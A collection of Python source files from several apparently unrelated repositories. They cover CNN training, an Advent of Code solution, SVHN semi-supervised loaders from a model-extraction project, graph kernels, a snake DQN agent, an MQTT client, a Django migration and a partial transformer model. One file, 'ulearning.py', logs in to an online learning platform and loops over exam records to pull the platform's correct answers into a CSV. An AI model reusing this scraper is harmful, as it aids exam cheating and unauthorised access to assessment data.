h_ctn1 = tw.nn.relu(ctn2d(x_2, W_ctn1, 1) + b_ctn1)
W_ctn2 = weight_variable([3, 3, 16, 16])
b_ctn2 = bias_variable([16])
h_ctn2 = tw.nn.relu(ctn2d(h_ctn1, W_ctn2, 1) + b_ctn2)
W_ctn3 = weight_variable([3, 3, 16, 16])
b_ctn3 = bias_variable([16])
h_ctn3 = tw.nn.relu(ctn2d(h_ctn2, W_ctn3, 1) + b_ctn3)
W_ctn4 = weight_variable([3, 3, 16, 16])
b_ctn4 = bias_variable([16])
h_ctn4 = tw.nn.relu(ctn2d(h_ctn3, W_ctn4, 1) + b_ctn4)
W_ctn5 = weight_variable([3, 3, 16, 16])
b_ctn5 = bias_variable([16])
h_ctn5 = tw.nn.relu(ctn2d(h_ctn4, W_ctn5, 1) + b_ctn5)
W_ctn6 = weight_variable([3, 3, 16, 16])
b_ctn6 = bias_variable([16])
h_ctn6 = tw.nn.relu(ctn2d(h_ctn5, W_ctn6, 1) + b_ctn6)
# Our pooling layer
h_pool4 = m_pool_2x2(h_ctn6)
n1, n2, n3, n4 = h_pool4.get_shape().as_list()
W_fc1 = weight_variable([n2*n3*n4, 2])
b_fc1 = bias_variable([2])
# We flatten our pool layer into a fully connected layer
h_pool4_flat = tw.reshape(h_pool4, [-1, n2*n3*n4])
y = tw.matmul(h_pool4_flat, W_fc1) + b_fc1
sn = tw.InteractiveSession()
# Our loss function and optimizer
loss = tw.reduce_mean(tw.nn.softmax_cross_entropy_with_logits(labels = y_, logits = y))
train_step = tw.train.AdamOptimizer(1e-4).minimize(loss)
sn.run(tw.initialize_all_variables())
saver = tw.train.Saver()
time_start = time.time()
v_loss = least_loss = 99999999
# Load data
full_set = []
for abts in attributes:
for ex in glob.glob(os.path.join(path_class, abts, "*")):
sample = cv2.imread(ex)
if not sample is None:
sample = cv2.resize(sample, (32, 32))
# Create an array representing our classes and set it
one_hot_array = [0] * len(attributes)
one_hot_array[attributes.index(abts)] = 1
assert(sample.shape == (32, 32, 3))
full_set.append((sample, one_hot_array, ex))
random.shuffle(full_set)
# We split our data into a training and test set here
split_index = int(math.floor(len(full_set) * train_test_split_ratio))
train_set = full_set[:split_index]
test_set = full_set[split_index:]
# We ensure that our training and test sets are a multiple of batch size
train_set_offset = len(train_set) % batch_size
test_set_offset = len(test_set) % batch_size
train_set = train_set[: len(train_set) - train_set_offset]
test_set = test_set[: len(test_set) - test_set_offset]
train_x, train_y, train_z = zip(*train_set)
test_x, test_y, test_z = zip(*test_set)
print("Starting training... [{} training examples]".format(len(train_x)))
v_loss = 9999999
train_loss = []
vn_loss = []
for z in range(0, m_epochs):
# Iterate over our training set
for tt in range(0, (len(train_x) // batch_size)):
start_batch = batch_size * tt
end_batch = batch_size * (tt + 1)
train_step.run(feed_dict={x: train_x[start_batch:end_batch], y_: train_y[start_batch:end_batch]})
seen = "Current epoch, examples seen: {:20} / {} \r".format(tt * batch_size, len(train_x))
sys.stdout.write(seen.format(tt * batch_size))
sys.stdout.flush()
seen = "Current epoch, examples seen: {:20} / {} \r".format((tt + 1) * batch_size, len(train_x))
sys.stdout.write(seen.format(tt * batch_size))
sys.stdout.flush()
t_loss = loss.eval(feed_dict={x: train_x, y_: train_y})
v_loss = loss.eval(feed_dict={x: test_x, y_: test_y})
train_loss.append(t_loss)
vn_loss.append(v_loss)
sys.stdout.write("Epoch {:5}: loss: {:15.10f}, validation loss: {:15.10f}".format(z + 1, t_loss, v_loss))
if v_loss < least_loss:
sys.stdout.write(", saving new best model to {}".format(checkpoint_name))
least_loss = v_loss
filename = saver.save(sn, checkpoint_name)
sys.stdout.write("\n")
plt.figure()
plt.xticks(np.arange(0, len(train_loss), 1.0))
plt.ylabel("Loss")
plt.xlabel("Epochs")
train_line = plt.plot(range(0, len(train_loss)), train_loss, 'r', label="Train loss")
vn_line = plt.plot(range(0, len(vn_loss)), vn_loss, 'g', label="Validation loss")
plt.legend()
plt.show()
zipped_x_y = list(zip(test_x, test_y))
cfn_true = []
cfn_ptd = []
for tt in range(0, len(zipped_x_y)):
q = zipped_x_y[tt]
sfmax = list(sn.run(tw.nn.softmax(y.eval(feed_dict={x: [q[0]]})))[0])
sf_idx = sfmax.index(max(sfmax))
predicted_label = attributes[sf_idx]
actual_label = attributes[q[1].index(max(q[1]))]
cfn_true.append(actual_label)
cfn_ptd.append(predicted_label)
if predicted_label != actual_label:
print("Actual: {}, predicted: {}".format(actual_label, predicted_label))
path_sample = test_z[tt]
epl_sample = cv2.imread(filename=path_sample)
# From sklearn docs
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
cm2 = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
cm2 = np.around(cm2, 2)
threshd = cm.max() / 2.
for c, z in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(z, c, str(cm[c, z]) + " / " + str(cm2[c, z]),
horizontalalignment="center",
color="white" if cm[c, z] > threshd else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
cnf_matrix = confusion_matrix(cfn_true, cfn_ptd)
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=attributes, normalize=False,
title='Normalized confusion matrix')
plt.show()
| 7,307 |
WinIO/WinIO/Scripts/WinIO2/Config/Application.py
|
sak9188/WinIO2
| 1 |
2173164
|
# -*- coding: UTF-8 -*-
from WinIO2.Config.Configure import ConfigureMeta, StringType
from collections import OrderedDict
# 应用程序的配置文件
class ApplicationString:
OutputFont = "OutputDefaultFontFamily"
OutputFontSize = "OutputDefaultFontSize"
BackgroundImage = "BackgroundImage"
class ApplicationCofigure(object):
ConfigDict = OrderedDict([
(ApplicationString.OutputFont, ("输出面板字体", None)),
(ApplicationString.OutputFontSize, ("输出面板字体大小", None)),
(ApplicationString.BackgroundImage, ("窗口桌面背景", "", StringType.Dialog))
])
Discribers = OrderedDict()
__metaclass__ = ConfigureMeta
| 595 |
day 15/Toon D - Python/day15.py
|
AE-nv/aedvent-code-2021
| 1 |
2170868
|
from queue import PriorityQueue
lines = open("day 15/Toon D - Python/input", "r").readlines()
grid = [[int(x) for x in line.replace('\n','')] for line in lines]
def is_in_field_1(x,y):
return x >= 0 and \
x < len(grid) and \
y >= 0 and \
y < len(grid[0])
def is_in_field_2(x,y):
return x >= 0 and \
x < len(grid) * 5 and \
y >= 0 and \
y < len(grid[0]) * 5
def get_value_1(x,y):
return grid[x][y]
def get_value_2(x,y):
diff_x, original_x = divmod(x, len(grid))
diff_y, original_y = divmod(y, len(grid))
distance = (grid[original_x][original_y] + diff_x + diff_y)
if distance > 9:
return 1 + distance % 10
else:
return distance
def dijkstra(len_x, len_y, get_distance, is_in_field):
shortest_paths = {str([x,y]): 999999999 for x in range(len_x) for y in range(len_y)}
visited = set()
queue = PriorityQueue()
queue.put((0, [0,0]))
while not queue.empty():
(distance, (a,b)) = queue.get()
for (da,db) in [(0,-1),(0,1),(-1,0),(1,0)]:
x = a + da
y = b + db
next_key = str([x,y])
if is_in_field(x,y):
if next_key in visited:
continue
d = distance + get_distance(x,y)
previous_d = shortest_paths[next_key]
if d < previous_d:
shortest_paths[next_key] = d
queue.put((d,[x,y]))
return shortest_paths
len_x_1 = len(grid)
len_y_1 = len(grid[0])
print('part 1: %i' % dijkstra(len_x_1, len_y_1, get_value_1, is_in_field_1)[str([len_x_1-1,len_y_1-1])])
len_x_2 = len_x_1*5
len_y_2 = len_y_1*5
print('part 2: %i' % dijkstra(len_x_2, len_y_2, get_value_2, is_in_field_2)[str([len_x_2-1,len_y_2-1])])
| 1,664 |
MixMatch-pytorch/dataset/svhn.py
|
cleverhans-lab/model-extraction-iclr
| 0 |
2171741
|
import numpy as np
from PIL import Image
import torchvision
import torch
class TransformTwice:
def __init__(self, transform):
self.transform = transform
def __call__(self, inp):
out1 = self.transform(inp)
out2 = self.transform(inp)
return out1, out2
def get_svhn(root, n_labeled,
transform_train=None, transform_val=None,
download=True):
base_dataset = torchvision.datasets.SVHN(root, split='train', download=download)
test_dataset = torchvision.datasets.SVHN(root, split='test', download=download)
train_labeled_idxs, train_unlabeled_idxs, val_idxs = train_val_split(test_dataset.labels, int(n_labeled/10))
train_labeled_idxs2, train_unlabeled_idxs2, val_idxs2 = train_val_split(
base_dataset.labels, int(n_labeled / 10), False)
train_labeled_dataset = SVHN_labeledmod(root, train_labeled_idxs, train=False, transform=transform_train)
train_unlabeled_dataset = SVHN_unlabeled(root, train_unlabeled_idxs, train=False, transform=TransformTwice(transform_train))
val_dataset = SVHN_labeled(root, val_idxs2, train=True, transform=transform_val, download=True)
test_dataset = SVHN_labeled(root, train=False, transform=transform_val, download=True)
#print("Test shape", train_labeled_dataset[0][0].shape)
print (f"#Labeled: {len(train_labeled_idxs)} #Unlabeled: {len(train_unlabeled_idxs)} #Val: {len(val_idxs)}")
return train_labeled_dataset, train_unlabeled_dataset, val_dataset, test_dataset, val_idxs
def train_val_split(labels, n_labeled_per_class, write=True):
labels = np.array(labels)
train_labeled_idxs = []
train_unlabeled_idxs = []
val_idxs = []
ent = 0
gap = 0
temp1 = np.load("svhnent.npy")
temp2 = np.load("svhngap.npy")
#pknn = 0
total = n_labeled_per_class*10
# To get an equal number of samples per class.
# for i in range(10):
# idxs = np.where(labels == i)[0]
# np.random.shuffle(idxs)
# train_labeled_idxs.extend(idxs[:n_labeled_per_class])
# train_unlabeled_idxs.extend(idxs[n_labeled_per_class:-500])
# val_idxs.extend(idxs[-500:])
# Random selection for point:
n_labeled = n_labeled_per_class * 10
idxs = np.where(labels < 10)[0] # All points
np.random.shuffle(idxs)
train_labeled_idxs.extend(idxs[:n_labeled])
train_unlabeled_idxs.extend(idxs[n_labeled: -1000]) # was 500
val_idxs.extend(idxs[-1000:])
if write == True:
for i in train_labeled_idxs:
ent += temp1[i]
gap += temp2[i]
file = f"svhn@{total}new/stats.txt"
f = open(file, "w")
f.write("Entropy: " + str(ent) + "\n")
f.write("Gap: " + str(gap) + "\n")
f.close()
np.random.shuffle(train_labeled_idxs)
np.random.shuffle(train_unlabeled_idxs)
np.random.shuffle(val_idxs)
return train_labeled_idxs, train_unlabeled_idxs, val_idxs
svhn_mean = (0.430, 0.428, 0.443) # equals np.mean(train_set.train_data, axis=(0,1,2))/255
svhn_std = (0.196, 0.198, 0.199) # equals np.std(train_set.train_data, axis=(0,1,2))/255
def normalise(x, mean=svhn_mean, std=svhn_std):
x, mean, std = [np.array(a, np.float32) for a in (x, mean, std)]
x = np.moveaxis(x, 1, 3)
#print("X", x.shape)
#print("mean", mean.shape)
x -= mean*255
x *= 1.0/(255*std)
return x
def transpose(x, source='NHWC', target='NCHW'):
return x.transpose([source.index(d) for d in target])
def pad(x, border=4):
return np.pad(x, [(0, 0), (border, border), (border, border)], mode='reflect')
class RandomPadandCrop(object):
"""Crop randomly the image.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, x):
x = pad(x, 4)
h, w = x.shape[1:]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
x = x[:, top: top + new_h, left: left + new_w]
return x
class RandomFlip(object):
"""Flip randomly the image.
"""
def __call__(self, x):
if np.random.rand() < 0.5:
x = x[:, :, ::-1]
return x.copy()
class GaussianNoise(object):
"""Add gaussian noise to the image.
"""
def __call__(self, x):
c, h, w = x.shape
x += np.random.randn(c, h, w) * 0.15
return x
class ToTensor(object):
"""Transform the image to tensor.
"""
def __call__(self, x):
x = torch.from_numpy(x)
return x
class SVHN_labeled(torchvision.datasets.SVHN):
def __init__(self, root, indexs=None, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_labeled, self).__init__(root, split='train' if train == True else 'test',
transform=transform, target_transform=target_transform,
download=download)
if indexs is not None:
self.data = self.data[indexs]
self.labels = np.array(self.labels)[indexs]
self.data = transpose(normalise(self.data))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], self.labels[index]
#print(img.shape)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
class SVHN_unlabeled(SVHN_labeled):
def __init__(self, root, indexs, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_unlabeled, self).__init__(root, indexs, train=train,
transform=transform, target_transform=target_transform,
download=download)
self.labels = np.array([-1 for i in range(len(self.labels))])
class SVHN_labeledmod(torchvision.datasets.SVHN):
def __init__(self, root, indexs=None, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_labeledmod, self).__init__(root, split='train' if train == True else 'test',
transform=transform, target_transform=target_transform,
download=download)
# print(type(self.data))
# print(self.data.shape)
# print(type(self.data[0]))
# print(self.data[0].shape)
if indexs is not None:
self.data = self.data[indexs]
#victim = load_private_model_by_id()
# temp = []
# for i in indexs:
#self.targets = victim(self.data)
# Use model predictions here?
targets = np.load("svhntargets.npy")
self.targets = np.array(targets)[indexs]
#print(self.targets)
self.data = transpose(normalise(self.data))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], self.targets[index]
#print(img.shape)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
| 7,869 |
utils/segk/utils.py
|
celi52/caskernel
| 1 |
2172372
|
import csv
import numpy as np
def read_edgelist(path, delimiter, nodetype=str, cols=2):
edges = list()
with open(path, encoding='utf8') as f:
for line in f:
t = line.split(delimiter)
if cols == 2:
edges.append((nodetype(t[0]),nodetype(t[1][:-1])))
elif cols > 2:
edges.append((nodetype(t[0]),nodetype(t[1])))
nodes = set()
for e in edges:
if e[0] not in nodes:
nodes.add(e[0])
if e[1] not in nodes:
nodes.add(e[1])
nodes = list(nodes)
return nodes, edges
def write_to_file(path, nodes, embeddings, delimiter=' '):
with open(path, 'w') as f:
writer = csv.writer(f, delimiter=delimiter)
for i,node in enumerate(nodes):
lst = [node]
lst.extend(embeddings[i,:].tolist())
writer.writerow(lst)
def extract_egonets(edgelist, radius, node_labels=None):
nodes = list()
neighbors = dict()
for e in edgelist:
if e[0] not in neighbors:
neighbors[e[0]] = [e[1]]
nodes.append(e[0])
else:
neighbors[e[0]].append(e[1])
if e[1] not in neighbors:
neighbors[e[1]] = [e[0]]
nodes.append(e[1])
else:
neighbors[e[1]].append(e[0])
egonet_edges = dict()
egonet_node_labels = dict()
for node in nodes:
egonet_edges[node] = set()
egonet_node_labels[node] = {node: 0}
for i in range(1, radius+1):
for node in nodes:
leaves = [v for v in egonet_node_labels[node] if egonet_node_labels[node][v]==(i-1)]
for leaf in leaves:
for v in neighbors[leaf]:
if v not in egonet_node_labels[node]:
egonet_node_labels[node][v] = i
egonet_edges[node].add((v,leaf))
for v2 in neighbors[v]:
if v2 in egonet_node_labels[node]:
egonet_edges[node].add((v,v2))
return egonet_edges, egonet_node_labels
def load_graph_classification_data(ds_name, use_node_labels):
nodes = list()
edges = list()
graph_indicator = dict()
node_labels = None
with open("datasets/graph_classification/%s/%s_graph_indicator.txt"%(ds_name,ds_name), "r") as f:
c = 1
for line in f:
graph_indicator[c] = int(line[:-1])
nodes.append(c)
c += 1
with open("datasets/graph_classification/%s/%s_A.txt"%(ds_name,ds_name), "r") as f:
for line in f:
edge = line[:-1].split(",")
edge[1] = edge[1].replace(" ", "")
edges.append((int(edge[0]), int(edge[1])))
if use_node_labels:
node_labels = dict()
with open("datasets/graph_classification/%s/%s_node_labels.txt"%(ds_name,ds_name), "r") as f:
c = 1
for line in f:
node_labels[c] = int(line[:-1])
c += 1
class_labels = list()
with open("datasets/graph_classification/%s/%s_graph_labels.txt"%(ds_name,ds_name), "r") as f:
for line in f:
class_labels.append(int(line[:-1]))
class_labels = np.array(class_labels, dtype=np.float32)
return nodes, edges, graph_indicator, node_labels, class_labels
def pyramid_match_kernel(Us, d=20, L=4):
N = len(Us)
Hs = {}
for i in range(N):
n = Us[i].shape[0]
Hs[i] = []
for j in range(L):
l = 2**j
D = np.zeros((d, l))
T = np.floor(Us[i]*l)
T[np.where(T==l)] = l-1
for p in range(Us[i].shape[0]):
if p >= n:
continue
for q in range(Us[i].shape[1]):
D[q,int(T[p,q])] = D[q,int(T[p,q])] + 1
Hs[i].append(D)
K = np.zeros((N,N))
for i in range(N):
for j in range(i,N):
k = 0
intersec = np.zeros(L)
for p in range(L):
intersec[p] = np.sum(np.minimum(Hs[i][p], Hs[j][p]))
k = k + intersec[L-1]
for p in range(L-1):
k = k + (1.0/(2**(L-p-1)))*(intersec[p]-intersec[p+1])
K[i,j] = k
K[j,i] = K[i,j]
return K
| 4,350 |
test/usermodule.py
|
by-student-2017/skpar-0.2.4_Ubuntu18.04LTS
| 9 |
2172269
|
"""Trivial user module."""
def userfunc(say='Hi'):
"""Test func with one parameter."""
return 'SKPAR says {}'.format(say)
TASKDICT = {'greet': userfunc}
| 163 |
agent/dqn/submission.py
|
youkeyao/SJTU-CS410-Snakes-3V3-Group06
| 1 |
2171737
|
import os
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
DEVICE = torch.device("cpu")
ENOUGH_LEN = 25
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
0: top,
1: bottom,
2: left,
3: right
}
class Net(nn.Module):
def __init__(self, obs_dim, act_dim):
super(Net, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=obs_dim, out_channels=16, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
)
self.conv2 = nn.Sequential(
nn.Conv2d(16, 16, 5, 1, 2),
nn.ReLU(),
)
self.fc1 = nn.Linear(6400, 32)
self.fc1.weight.data.normal_(0, 0.1)
self.outA = nn.Linear(32, act_dim)
self.outA.weight.data.normal_(0, 0.1)
self.outV = nn.Linear(32, 1)
self.outV.weight.data.normal_(0, 0.1)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = F.relu(x)
advantage = self.outA(x)
value = self.outV(x)
Q = value + advantage - advantage.mean(-1).view(-1,1)
return Q
class Agent(object):
def __init__(self, obs_dim, act_dim):
self.obs_dim = obs_dim
self.act_dim = act_dim
self.eval_net = Net(obs_dim, act_dim)
def choose_action(self, x):
x = torch.FloatTensor(x)
actions_value = self.eval_net.forward(x)
action = torch.max(actions_value, 1)[1].data.numpy()
return action
def load_model(self, path):
eval = torch.load(path)
self.eval_net.load_state_dict(eval)
def get_observations(state, agents_index, height, width):
observations = []
for i in agents_index:
sample = []
head = state[i+2][0]
sample.append(getArea(state[i+2], height, width, head, True))
other_snake = np.zeros((width, width))
for j in range(2, 8):
other_snake += getArea(state[j], height, width, head, True)
sample.append(other_snake)
sample.append(getArea(state[1], height, width, head, False))
observations.append(sample)
return np.array(observations)
def countPos(head, p, width, height):
tmp = [0, 0]
tmp[0] = int(p[0] - head[0] + height - 1) % height
tmp[1] = int(p[1] - head[1] + width * 3 / 2) % width
return tmp
def getArea(state, height, width, head, isSnake):
areas = np.zeros((height, width))
for j in range(len(state)):
p = tuple(countPos(head, state[j], width, height))
if isSnake and j == 0:
areas[p] = 10
areas[((p[0] + 1) % height, p[1])] = 1
areas[((p[0] + height - 1) % height, p[1])] = 1
areas[(p[0], (p[1] + 1) % width)] = 1
areas[(p[0], (p[1] + width - 1) % width)] = 1
else:
areas[p] = 5
return np.concatenate((areas, areas))
def can_follow_tail(obs):
length = len(obs[obs['controlled_snake_index']])
head = tuple(obs[obs['controlled_snake_index']][0])
tail = tuple(obs[obs['controlled_snake_index']][length - 1])
act = ((tail[0] - head[0] + obs['board_height'] % obs['board_height'], tail[1] - head[1] + obs['board_width'] % obs['board_width']))
if length >= ENOUGH_LEN and act in Action.actlist:
return (True, Action.actlist.index(act))
else:
return (False,)
def my_controller(observation, action_space, is_act_continuous=False):
follow_tail = can_follow_tail(observation)
if follow_tail[0]:
action = follow_tail[1]
return [Action.mapAct[action]]
board_width = observation['board_width']
board_height = observation['board_height']
o_index = observation['controlled_snake_index'] # 2, 3, 4, 5, 6, 7 -> indexs = [0,1,2,3,4,5]
o_indexs_min = 3 if o_index > 4 else 0
indexs = [o_indexs_min, o_indexs_min+1, o_indexs_min+2]
obs = get_observations(observation, indexs, board_height, board_width)
# agent
agent = Agent(3, 4)
eval = os.path.dirname(os.path.abspath(__file__)) + "/trained_model/eval_3000.pth"
agent.load_model(eval)
action = agent.choose_action(obs)[o_index-o_indexs_min-2]
return [Action.mapAct[action]]
| 4,395 |
JQTT/sub.py
|
Jaimeloeuf/JQTT
| 1 |
2171265
|
""" Dependencies """
import paho.mqtt.subscribe as subscribe
# Using the thread class to use threads and prevent the subscribe call from blocking.
from threading import Thread
# Client class
import paho.mqtt.client as mqtt
# Global variable to store the topic name, default broker is here too
broker = "m2m.eclipse.org"
# Global variable to store the topic name, default topic is here too
topic = ""
# Global variable to store the transaction QoS, default value here.
qos = 1
def set_broker(data):
# Function exposed to the other modules to set their own topics to publish to.
global broker
broker = data
def set_topic(data=None):
# Function exposed to the other modules to set their own topics to publish to.
global topic
topic = data
def set_qos(data=None):
# Function exposed to the other modules to set their own topics to publish to.
global qos
qos = data
# Default callback function for subscriptions to use if none given during subscription
def new_Msg(client, userdata, message):
""" Arguements passed in by the subscription service:
client: The MQTT client object
user_data: User data that was included in the message payload
message: The message that was received
"""
# print("%s : %s" % (message.topic, message.payload))
print(client)
print(userdata)
print(str(message.payload)) # Just print out the message body
subscriptions = []
def sub(cb=new_Msg):
# Create a new client
client = mqtt.Client()
# Append the subscription to the array to allow more than one subscription.
# subscriptions.append(client)
# Add event handler / callback function when there is a new incoming message.
client.on_message = cb
# Establish a connection with the broker using the default port. Note that this call is blocking
client.connect(broker, port=1883)
# After a successful connection, establish a subscription pipe with the broker to the specified topic
# Qos is currently 1, will create another function to allow overiding this.
client.subscribe(topic, qos=1)
# Put the blocking subscribe action into a daemonic thread based loop and return control to the main thread.
client.loop_start()
subscriptions.append(client)
# Debug statement.
print("Subscribed to topic: ", topic)
if __name__ == "__main__":
# If module called as standalone module, run the example code below to demonstrate this MQTT client lib
from time import sleep
# Threading library used to wait for daemons
from Jevents import wait_for_daemons
# Set topic for subscription
set_topic('IOTP/grp4/channel/')
# Subscribe to the above topic
sub()
""" Inner functions like this can also be used as the callback function for a subscription.
Note that if you are defining your own callback functions, make sure it accepts the same input parameters
as the parameters shown in the example and default subscription on_message callback function, 'new_Msg' """
def new_Msg2(client, userdata, message):
print('This is the new handler, msg is: ', message.payload.decode()) # Decode the bytes array to UTF8
# Set new topic for subscription
set_topic('IOTP/grp4/channel/hellow')
# Subscribe to te newly set topic
sub(new_Msg2)
""" Blocking call on the main thread to prevent it from ending when there are still Daemonic
threads running in the background such as the subscription services which are daemons. """
# wait_for_daemons()
""" Below is an alternative to using wait_for_daemons by keeping the main thread busy with an
infinite loop printing out stuff to simulate other actions that can happen in the main thread """
try:
while True:
# Print something to emulate the main thread doing something.
print('chicken')
sleep(0.8) # Blocking wait call.
except KeyboardInterrupt:
for sub in subscriptions:
sub.disconnect()
| 4,024 |
p0sx/pos/migrations/0013_auto_20210823_0345.py
|
bluesnail95m/nuxis
| 3 |
2173074
|
# Generated by Django 3.2.6 on 2021-08-23 03:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pos', '0012_sumupapikey_sumupterminal_sumuptransaction'),
]
operations = [
migrations.AlterField(
model_name='creditupdate',
name='updated_by_user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_by_user', to='pos.user'),
),
migrations.CreateModel(
name='SumUpCard',
fields=[
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, unique=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('status', models.SmallIntegerField(choices=[(0, 'CREATED'), (1, 'PROCESSING'), (2, 'SUCCESS'), (3, 'FAILED'), (4, 'COMPLETE')], default=0)),
('transaction_id', models.CharField(blank=True, max_length=64, null=True)),
('transaction_comment', models.CharField(blank=True, max_length=256, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('timestamp', models.DateTimeField(auto_now=True)),
('authorized_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='pos.user')),
],
),
]
| 1,688 |
杂项/HeinrichMarxCup2020/ulearning.py
|
FengGuanxi/HDU-Experience
| 556 |
2172986
|
# -*-coding:utf-8-*-
# author: zh-spike
from typing import Pattern
import requests
import json
import re
import getpass
from bs4 import BeautifulSoup
import csv
headers = {
'User-Agent' : 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection' : 'Keep-Alive',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
# 定义所需url
login_url = "https://www.ulearning.cn/umooc/user/login.do" # 登录
info_url = "https://api.ulearning.cn/user" # 获取用户信息的接口
# 启动一个session,用于登录交互
session = requests.Session()
# 存储单个章节信息
chapter = {"title": None, "id": None, "sections": []}
# token
token =""
# 登录函数
def login():
auth = {}
auth["name"] = input("[*] 用户名:")
auth["passwd"] = getpass.getpass("[*] 密码(输入时不可见):")
session.post(login_url, auth)
if "token" in session.cookies.keys():
global token
token = session.cookies["token"]
print("[+] 登录成功")
return True
else:
print("[-] 登录失败")
# 显示用户信息
def print_user_info():
res = session.get(info_url, headers={"UA-AUTHORIZATION": token})
info = res.text.strip()
info = json.loads(info)
print("[*] 用户ID: " + str(info["userid"]))
print("[*] 用户姓名: " + info["name"])
# 开始
def work():
i = 0
uri_header="https://www.ulearning.cn/umooc/user/study.do?operation=examReport&examid=33716&examuserid=7853135"
with open('data.csv','w',encoding='utf-8') as f:
while i < 127:
res_header =session.get(uri_header, headers={"UA-AUTHORIZATION": token})
res_header=res_header.text
# soup = BeautifulSoup(res_header,'html.parser')
# print(res_header)
examuser_id = re.findall('examuserid=(\d+)',res_header)
paper_original = re.findall('paperID: "(\d+)"',res_header)
exam_original = re.findall('examId: "(\d+)"',res_header)
uri_header="https://www.ulearning.cn/umooc/user/study.do?operation=examReport&examid=33716&examuserid="+examuser_id[i]
# print(uri_header)
# print(examuser_id)
# print(paper_original)
# print(exam_original)
uri_answer="https://www.ulearning.cn/umooc/learner/exam.do?operation=getCorrectAnswer&paperID="+paper_original[0]+"&examID="+exam_original[0]
# print(uri_answer)
uri_paper= "https://www.ulearning.cn/umooc/learner/exam.do?operation=getPaperForStudent&paperID="+paper_original[0]+"&examId="+exam_original[0] +"&userId=7753979"
# print(uri_paper)
res_paper = session.get(uri_paper, headers={"UA-AUTHORIZATION": token})
res_answer = session.get(uri_answer, headers={"UA-AUTHORIZATION": token})
res_paper=res_paper.text
res_answer = res_answer.text
# question_id = re.findall('"questionid":(\d+)',res_paper)
children_id = re.findall('"questionid":(\d+),"score":\d,"title":"(.*?)"',res_paper)
answer_id = re.findall('"(\d+)":{"correctAnswer":"(.*?)"',res_answer)
number=0
# print(children_id)
# print(answer_id)
# print(len(question_id))
while number < 75:
qid = children_id[number][0]
qtitle=children_id[number][-1]
qtitle= qtitle.replace("\n","")
qtitle= qtitle.replace(",","")
correctid = answer_id[number][0]
correctAnswer = answer_id[number][1]
print('题号: {},题目: {},答案号: {},答案: {}'.format(qid,qtitle,correctid,correctAnswer))
f.write("{},{},{},{}\n".format(qid,qtitle,correctid,correctAnswer))
number += 1
# print(res_paper)
# print (res_answer)
i += 1
f.close()
def main():
if not login():
main()
else:
print_user_info()
work()
if __name__ == '__main__':
main()
| 3,632 |
fastgc/model/ctransformer.py
|
ppmlguy/fastgradclip
| 2 |
2172361
|
import torch
import torch.nn as nn
from fastgc.layers.linear import Linear
from fastgc.layers.transformer import PositionalEncoding
from fastgc.layers.transformer import TransformerEncoder
from fastgc.layers.transformer import TransformerEncoderLayer
class TransformerModel(nn.Module):
def __init__(self, n_token, n_classes, d_model=512, n_layers=2,
n_head=8, n_hidden=2048, dropout=0.1, max_seq_len=512,
embeddings=None, train_alg='batch'):
super(TransformerModel, self).__init__()
self.train_alg = train_alg
self.d_model = d_model
self.n_head = n_head
if embeddings is None:
self.token_embedding = nn.Embedding(n_token, d_model)
else:
self.token_embedding = nn.Embedding.from_pretrained(embeddings)
self.token_embedding.weight.requires_grad = False
self.pos_encoder = PositionalEncoding(d_model, dropout, max_seq_len)
encoder_layers = TransformerEncoderLayer(d_model, n_head, n_hidden, dropout)
# encoder_norm = nn.LayerNorm(d_model)
encoder_norm = None
self.encoder = TransformerEncoder(encoder_layers, n_layers, encoder_norm)
self.fc= Linear(d_model, n_classes)
def init_weights(self):
initrange = 0.1
self.token_embedding.weight.data.uniform_(-initrange, initrange)
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
def forward(self, x):
# positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
x = x.transpose(0, 1)
